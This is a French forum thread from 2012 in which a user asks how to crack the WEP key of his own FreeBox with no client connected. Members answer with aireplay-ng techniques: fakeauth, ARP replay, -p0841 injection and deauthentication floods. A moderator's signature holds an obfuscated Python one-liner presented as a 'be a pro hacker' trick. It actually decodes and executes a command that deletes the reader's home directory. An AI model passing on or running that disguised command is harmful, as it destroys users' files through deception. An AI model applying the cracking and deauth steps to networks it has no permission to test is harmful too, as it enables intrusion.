Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 04-11-2012 13:41:58

xdlol123321
Nouveau membre

Crack WEP sans client sur FreeBox : les datas ne montent pas !!

Bonjour à toutes et à tous,
Je suis nouveau dans le monde de la sécurité wifi et cela fait bien longtemps que je fais des recherches car cet art m'intéresse vraiment.
Voilà mon probleme :
Depuis quelques temps je me suis mis à essayer le crack du mot de passe de ma FreeBox mais SANS client, et je vous avoue que je trouve cela bien plus difficile smile
Ma FreeBox est crypté en WEP et le filtrage MAC est désactivé. Je dispose de deux ordinateurs portables donc les cartes wifi supportent toutes deux l'injection (il me semble smile ). Il me semble aussi important de vous dire que je tourne sous BackTrack 5 R3 en live USB sur l'un de mes ordinateurs et en live CD sur l'autre.

Voici comment j'ai procédé pour le crack (l'essai du moins) :
J'ai d'abord passé ma carte en mode monitor.
J'ai lancé une fakeauth sur le réseau --> Cela a fonctionné et j'avais Sending keep-alive packet! à l'écran.
Mais les datas ne montent pas ! Au bout d'un certaine on monte à 1 parfois à un peu plus.
Je lance les attaques : aireplay-ng -4 --> au bout de 5 secondes de fonctionnement BT me met un message d'erreur.
                                                             J'essaie en mode authentifié -h mais ça ne fonctionne pas non plus.
                                  aireplay-ng -5 --> pareil ça ne fonctionne pas ;(
On voit les datas augmenter très lentement, enfin quasiment pas (1 data toutes les 5 minutes)
J'ai fait quelques recherches et j'ai pu tester une autre attaque : wesside-ng + aireplay-ng -3
       Ça me met tout un tas d'erreur sur l'écran ( Error retransmits 40 bytes ou quelque chose comme cela).
Les datas augmentent au ralentis sad
J'aimerais savoir s'il existe un moyen de cracker cette wifi sans client connecté et les moyens d'y parvenir.
J'ai vu dans les autres discussions (en faisant les recherches) que les réponses que vous donniez permettaient très souvent de résoudre les problèmes posés smile
Merci d'avance de votre aide smile))

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 04-11-2012 13:59:58

spawn
Modérateur

Re : Crack WEP sans client sur FreeBox : les datas ne montent pas !!

Pas de client implique pas de data garçon (:
Pour le wep, il te faut un client.
Un point c'est tout.

Il faut des paquets donc un morceau est chiffré avec la clef pour pouvoir la deviner, et ces paquets ne sont générés que quand un client papote avec l'AP. Ou que tu te fais passer pour un client. Dans tous les cas, un client est indispensable.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 04-11-2012 14:59:18

xdlol123321
Nouveau membre

Tout d'abord merci pour ta réponse.
Mais se faire passer pour un client ça se fait par fakeauth non ? Avec l'attaque aireplay-ng -1 ?
Et bien comme je l'ai dis dans mon premier post, je laisse tourner la fakeauth en permanence durant l'attaque !
Mais c'est après que ça bloque, comment puis-je faire pour, soit obtenir mon fichier .xor soit faire monter mes IVs ?

#4 04-11-2012 15:22:01

antares145
Membre d'honneur
Site Web

Salut, bienvenue sur le forum (et merci pour la description détaillée du problème, ça nous change) smile

La fakeauth ne sert qu'à t'associer auprès de l'AP, c'est-à-dire faire en sorte qu'il n'ignore pas ce que tu vas lui envoyer. Ca se fait sans connaître la clé du réseau (heureusement ^^) et ça ne te permet pas d'injecter du trafic. Tu ne peux pas "faire monter les data" tout seul sans la clé, et si tu connais la clé l'attaque n'a plus tellement d'intérêt.

La seule chose que tu peux faire c'est attendre qu'il y aie des datas légitimes émises sur le réseau (par un client autorisé) et t'en servir pour les rejouer ou les modifier. Pas de client = pas de data légitime = pas d'attaque.
Alors je sais qu'on présente les attaques ChopChop et Fragmentation comme des attaques "sans client", mais malheureusement c'est de moins en moins vrai hmm Il leur faut au moins un paquet de données, ce que les anciennes box émettaient parfois "gratuitement" même sans client mais c'est beaucoup plus rares de nos jours. De plus, un certain nombre de box et points d'accès sont désormais immunisés en partie ou totalement contre ces attaques...

Si tu as quand même un ou deux paquets de data qui trainent, et que les attaques sus-mentionnées n'en veulent pas, tu peux essayer la -p0841 qui prend virtuellement "n'importe quoi" pour pouvoir le réinjecter. Ca pose parfois problème au moment du crack (ou la technique rapide PTW se prend les pieds dans le tapis) mais si c'est la seule option, bah... wink

Évidemment, la solution la plus simple c'est de générer (beaucoup de) trafic avec une autre de tes machines sur le même réseau, et de lancer une attaque par rejeu d'ARP (aireplay-ng -3), c'est le plus efficace.

#5 04-11-2012 15:51:02

koala
Membre d'honneur
Lieu : In the sky

Au pire envoi des deauth sur la box cible pendant une dizaine de minute et au moment ou tu enleve l'attaque tu lance -p0841, la box devrait générer un peu plus de paquet que d'habitude a l'enlevement de la deauth peut-etre que -p0841 pourra utiliser un ce plus de paquet smile

Sinon comme dis plus tu attends qu'un client se connecte wink

#6 04-11-2012 20:49:57

xdlol123321
Nouveau membre

Merci BEAUCOUP à vous tous ! Vous êtes vraiment supers !!!
Tout est parfaitement expliqué, encore merci smile
Je teste tout ça ce soir ou demain et je vous redis comment ça c'est passé ! wink

Annonce